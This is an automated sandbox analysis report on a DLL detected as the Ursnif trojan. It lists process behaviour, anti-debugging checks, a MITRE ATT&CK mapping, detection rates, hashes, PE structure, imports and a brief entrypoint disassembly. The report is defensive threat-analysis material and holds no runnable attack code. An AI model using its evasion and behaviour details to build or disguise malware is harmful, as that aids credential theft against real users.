Source: Yara match	File source: 00000018.00000002.474907412.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	API coverage: 9.0 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 5.9 %

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E241F6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6E241F6D

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E24966F mov eax, dword ptr fs:[00000030h]		0_2_6E24966F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E24966F mov eax, dword ptr fs:[00000030h]		2_2_6E24966F

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E241F6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6E241F6D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E2207A7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6E2207A7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E220288 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6E220288
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E241F6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6E241F6D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E2207A7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6E2207A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E220288 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6E220288

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\Y0K4O5JTDz.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior

Source: loaddll32.exe, 00000000.00000002.472770851.0000000001160000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.475426616.0000000003280000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.472311664.0000000003610000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.518770463.0000000003410000.00000002.00000001.sdmp, rundll32.exe, 00000010.00000002.474127173.0000000003A70000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.488597441.0000000003610000.00000002.00000001.sdmp, rundll32.exe, 00000018.00000002.473979902.0000000003610000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.472770851.0000000001160000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.475426616.0000000003280000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.472311664.0000000003610000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.518770463.0000000003410000.00000002.00000001.sdmp, rundll32.exe, 00000010.00000002.474127173.0000000003A70000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.488597441.0000000003610000.00000002.00000001.sdmp, rundll32.exe, 00000018.00000002.473979902.0000000003610000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.472770851.0000000001160000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.475426616.0000000003280000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.472311664.0000000003610000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.518770463.0000000003410000.00000002.00000001.sdmp, rundll32.exe, 00000010.00000002.474127173.0000000003A70000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.488597441.0000000003610000.00000002.00000001.sdmp, rundll32.exe, 00000018.00000002.473979902.0000000003610000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.472770851.0000000001160000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.475426616.0000000003280000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.472311664.0000000003610000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.518770463.0000000003410000.00000002.00000001.sdmp, rundll32.exe, 00000010.00000002.474127173.0000000003A70000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.488597441.0000000003610000.00000002.00000001.sdmp, rundll32.exe, 00000018.00000002.473979902.0000000003610000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E220604 cpuid

0_2_6E220604

Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6E25DF65
Source: C:\Windows\System32\loaddll32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_6E25DD96
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E253952
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6E25E61F
Source: C:\Windows\System32\loaddll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_6E25E6EC
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_6E25E518
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6E254323
Source: C:\Windows\System32\loaddll32.exe	Code function: ___crtGetLocaleInfoEx,	0_2_6E21F364
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6E25E3EF
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E25E00E
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E25E077
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E25E112
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6E21F1B7
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_6E25E19F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6E25DF65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	2_2_6E25DD96
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6E253952
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6E25E61F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_6E25E6EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_6E25E518
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6E254323
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoEx,	2_2_6E21F364
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6E25E3EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6E25E00E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6E25E077
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6E25E112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6E21F1B7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_6E25E19F

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E209A14 GetSystemTimeAsFileTime,

0_2_6E209A14

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E258951 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_6E258951

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: Y0K4O5JTDz.dll, type: SAMPLE
Source: Yara match	File source: 3.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6e1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.518987950.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.475060646.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.493394816.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.473300457.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.474907412.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: Y0K4O5JTDz.dll, type: SAMPLE
Source: Yara match	File source: 3.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6e1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.518987950.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.475060646.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.493394816.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.473300457.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.474907412.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1E16BC __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,		0_2_6E1E16BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E1E16BC __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,		2_2_6E1E16BC

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Rundll321	Input Capture1	System Time Discovery2	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Security Software Discovery1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	System Information Discovery22	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Y0K4O5JTDz.dll	72%	Virustotal		Browse
Y0K4O5JTDz.dll	86%	ReversingLabs	Win32.Trojan.Ursnif
Y0K4O5JTDz.dll	100%	Avira	TR/Spy.Ursnif.ozghq

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
16.2.rundll32.exe.6e1e0000.1.unpack	100%	Avira	HEUR/AGEN.1142290	Download File
13.2.rundll32.exe.6e1e0000.1.unpack	100%	Avira	HEUR/AGEN.1142290	Download File
3.2.rundll32.exe.6e1e0000.1.unpack	100%	Avira	HEUR/AGEN.1142290	Download File
21.2.rundll32.exe.6e1e0000.1.unpack	100%	Avira	HEUR/AGEN.1142290	Download File
24.2.rundll32.exe.6e1e0000.1.unpack	100%	Avira	HEUR/AGEN.1142290	Download File
2.2.rundll32.exe.6e1e0000.1.unpack	100%	Avira	HEUR/AGEN.1142290	Download File
0.2.loaddll32.exe.6e1e0000.0.unpack	100%	Avira	HEUR/AGEN.1142290	Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	449025
Start date:	15.07.2021
Start time:	02:43:38
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Y0K4O5JTDz (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	43
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal64.troj.winDLL@55/0@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 50.7% (good quality ratio 47.8%) Quality average: 77.3% Quality standard deviation: 28.3%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): wermgr.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.7900551631674855
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Y0K4O5JTDz.dll
File size:	960000
MD5:	d1253fcbf6ae056cff716ff6670c2c11
SHA1:	68a6945ac7d27651b221ba0ad10b9c3ae8c878f8
SHA256:	e2e8a185580a5831bd7ddfcbed30cb21965cfb3bd546b4cffd85dc886671aeea
SHA512:	51264676f733244a4b7896c8ac1da657b1240f705ef08bb796b3044e4cadf50bd793556b27c7a203af3e8326d9d75830a8129f1022f683bb21fa395fc507369e
SSDEEP:	24576:HQfpzjXPgfk8CJV4X+IBIJ3cazaLwj1mCG9CpNiLi:IFDgYJV4OaIRj150CpNiLi
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t...0...0...0....{i.3...9...#...b...4...b...=...b...=....{r.&...0.......b.......b...1...b.b.1...0...1...b...1...Rich0..........

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x1040052
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x1000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5AC512FB [Wed Apr 4 18:01:31 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	7a79d10b1d4343a18a4f6e25e165b4ae

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FC6E0389F07h
call 00007FC6E038A8E2h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007FC6E0389DAFh
add esp, 0Ch
pop ebp
retn 000Ch
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 00007FC6E0389716h
jmp 00007FC6E0389EE0h
mov ecx, dword ptr [ebp-14h]
xor ecx, ebp
call 00007FC6E0389705h
jmp 00007FC6E0389ECFh
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [010E506Ch]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [010E506Ch]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
inc dword ptr fs:[eax]

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xe35b0	0x9c	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xe364c	0x8c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xfd000	0x9d0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xfe000	0x5074	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xde820	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xde878	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8a000	0x26c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x883dc	0x88400	False	0.544626218463	data	6.71833159013	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8a000	0x5a440	0x5a600	False	0.658643456086	data	5.95813601066	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xe5000	0x17ebc	0x1c00	False	0.184291294643	data	4.04646123564	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xfd000	0x9d0	0xa00	False	0.396484375	data	3.77819611332	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xfe000	0x5074	0x5200	False	0.726133765244	data	6.63977268899	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_DIALOG	0xfd1c0	0x10e	data	English	United States
RT_DIALOG	0xfd2d0	0xc0	dBase III DBT, next free block index 4294901761	English	United States
RT_DIALOG	0xfd390	0x126	data	English	United States
RT_DIALOG	0xfd4b8	0xf0	data	English	United States
RT_DIALOG	0xfd5a8	0xba	data	English	United States
RT_DIALOG	0xfd664	0xec	data	English	United States
RT_DIALOG	0xfd750	0x124	data	English	United States
RT_MANIFEST	0xfd874	0x15a	ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetProcessHeap, CreateFileW, SetStdHandle, ReadConsoleW, WriteConsoleW, HeapSize, SetEndOfFile, SetEnvironmentVariableW, GetOEMCP, IsValidCodePage, FindNextFileW, FindNextFileA, FindFirstFileExW, FindFirstFileExA, FindClose, GetTimeZoneInformation, OutputDebugStringA, OutputDebugStringW, WaitForSingleObjectEx, CreateSemaphoreA, GetSystemTimeAsFileTime, TlsGetValue, VirtualProtectEx, TlsAlloc, GetSystemDirectoryA, GetTempPathA, Sleep, GetCommandLineA, GetModuleHandleA, InitializeCriticalSection, SetSystemPowerState, EnterCriticalSection, VirtualProtect, GetModuleFileNameA, MultiByteToWideChar, GetLastError, FormatMessageW, WideCharToMultiByte, GetStringTypeW, LeaveCriticalSection, DeleteCriticalSection, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsSetValue, TlsFree, GetTickCount, GetModuleHandleW, GetProcAddress, EncodePointer, DecodePointer, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, GetCurrentThread, GetACP, GetStdHandle, GetFileType, CloseHandle, WaitForSingleObject, GetExitCodeProcess, CreateProcessA, CreateProcessW, GetFileAttributesExW, WriteFile, GetConsoleCP, GetConsoleMode, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, FlushFileBuffers, ReadFile, SetFilePointerEx, HeapReAlloc, SetConsoleCtrlHandler, CreateThread
USER32.dll	SetFocus, GetCursorPos, RegisterClassExA, GetFocus, GetClassInfoExA, GetKeyNameTextA, GetWindowTextLengthA, CallWindowProcA, IsDlgButtonChecked, DestroyIcon, AppendMenuA, DrawIconEx, DrawEdge
GDI32.dll	BitBlt, DeleteDC, CreatePen, DeleteObject, CreateDCA, GetObjectA, DPtoLP
ole32.dll	OleUninitialize, OleSetContainedObject, OleInitialize
